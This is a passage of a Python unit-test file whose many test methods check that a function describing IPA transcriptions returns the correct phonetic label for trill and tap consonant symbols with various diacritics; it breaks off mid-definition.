# voiceless aspirated pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʙ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial trill pulmonic egressive consonant
def test_ʙ_is_the_representation_of_the_voiced_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ")
self.assertEqual(actual, expected)
# voiced labialized bilabial trill pulmonic egressive consonant
def test_ʙʷ_is_the_representation_of_the_voiced_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial trill pulmonic egressive consonant
def test_ʙʲ_is_the_representation_of_the_voiced_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial trill pulmonic egressive consonant
def test_ʙˠ_is_the_representation_of_the_voiced_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial trill pulmonic egressive consonant
def test_ʙʰ_is_the_representation_of_the_voiced_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial trill pulmonic egressive consonant
def test_ʙʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰʷ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial trill pulmonic egressive consonant
def test_ʙʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰʲ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial trill pulmonic egressive consonant
def test_ʙʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰˠ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial trill pulmonic egressive consonant
def test_ʙʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙʰˤ")
self.assertEqual(actual, expected)
def test_ʙ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial trill pulmonic egressive consonant"
actual = describe_transcription("ʙ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar trill pulmonic egressive consonant
def test_r̊_is_the_representation_of_the_voiceless_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊")
self.assertEqual(actual, expected)
def test_r̥_is_the_representation_of_the_voiceless_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar trill pulmonic egressive consonant
def test_r̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʷ")
self.assertEqual(actual, expected)
def test_r̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar trill pulmonic egressive consonant
def test_r̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʲ")
self.assertEqual(actual, expected)
def test_r̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar trill pulmonic egressive consonant
def test_r̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ˠ")
self.assertEqual(actual, expected)
def test_r̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar trill pulmonic egressive consonant
def test_r̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ˤ")
self.assertEqual(actual, expected)
def test_r̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar trill pulmonic egressive consonant
def test_r̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰ")
self.assertEqual(actual, expected)
def test_r̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar trill pulmonic egressive consonant
def test_r̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰʷ")
self.assertEqual(actual, expected)
def test_r̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar trill pulmonic egressive consonant
def test_r̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰʲ")
self.assertEqual(actual, expected)
def test_r̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar trill pulmonic egressive consonant
def test_r̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰˠ")
self.assertEqual(actual, expected)
def test_r̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar trill pulmonic egressive consonant
def test_r̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̥ʰˤ")
self.assertEqual(actual, expected)
def test_r̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar trill pulmonic egressive consonant
def test_r_is_the_representation_of_the_voiced_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r")
self.assertEqual(actual, expected)
# voiced labialized alveolar trill pulmonic egressive consonant
def test_rʷ_is_the_representation_of_the_voiced_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar trill pulmonic egressive consonant
def test_rʲ_is_the_representation_of_the_voiced_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar trill pulmonic egressive consonant
def test_rˠ_is_the_representation_of_the_voiced_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar trill pulmonic egressive consonant
def test_rˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar trill pulmonic egressive consonant
def test_rʰ_is_the_representation_of_the_voiced_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰ")
self.assertEqual(actual, expected)
def test_r̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar trill pulmonic egressive consonant
def test_rʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰʷ")
self.assertEqual(actual, expected)
def test_r̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar trill pulmonic egressive consonant
def test_rʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰʲ")
self.assertEqual(actual, expected)
def test_r̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar trill pulmonic egressive consonant
def test_rʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰˠ")
self.assertEqual(actual, expected)
def test_r̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar trill pulmonic egressive consonant
def test_rʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("rʰˤ")
self.assertEqual(actual, expected)
def test_r̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar trill pulmonic egressive consonant"
actual = describe_transcription("r̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless uvular trill pulmonic egressive consonant
def test_ʀ̊_is_the_representation_of_the_voiceless_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊")
self.assertEqual(actual, expected)
def test_ʀ̥_is_the_representation_of_the_voiceless_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular trill pulmonic egressive consonant
def test_ʀ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʷ")
self.assertEqual(actual, expected)
def test_ʀ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular trill pulmonic egressive consonant
def test_ʀ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʲ")
self.assertEqual(actual, expected)
def test_ʀ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular trill pulmonic egressive consonant
def test_ʀ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ˠ")
self.assertEqual(actual, expected)
def test_ʀ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular trill pulmonic egressive consonant
def test_ʀ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ˤ")
self.assertEqual(actual, expected)
def test_ʀ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular trill pulmonic egressive consonant
def test_ʀ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular trill pulmonic egressive consonant
def test_ʀ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʀ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular trill pulmonic egressive consonant
def test_ʀ_is_the_representation_of_the_voiced_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ")
self.assertEqual(actual, expected)
# voiced labialized uvular trill pulmonic egressive consonant
def test_ʀʷ_is_the_representation_of_the_voiced_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular trill pulmonic egressive consonant
def test_ʀʲ_is_the_representation_of_the_voiced_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular trill pulmonic egressive consonant
def test_ʀˠ_is_the_representation_of_the_voiced_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular trill pulmonic egressive consonant
def test_ʀˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular trill pulmonic egressive consonant
def test_ʀʰ_is_the_representation_of_the_voiced_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular trill pulmonic egressive consonant
def test_ʀʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰʷ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular trill pulmonic egressive consonant
def test_ʀʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰʲ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular trill pulmonic egressive consonant
def test_ʀʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰˠ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular trill pulmonic egressive consonant
def test_ʀʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀʰˤ")
self.assertEqual(actual, expected)
def test_ʀ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_trill_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular trill pulmonic egressive consonant"
actual = describe_transcription("ʀ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊_is_the_representation_of_the_voiceless_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊")
self.assertEqual(actual, expected)
def test_ⱱ̥_is_the_representation_of_the_voiceless_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥")
self.assertEqual(actual, expected)
# voiceless labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʷ")
self.assertEqual(actual, expected)
def test_ⱱ̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʲ")
self.assertEqual(actual, expected)
def test_ⱱ̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ˠ")
self.assertEqual(actual, expected)
def test_ⱱ̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ˤ")
self.assertEqual(actual, expected)
def test_ⱱ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
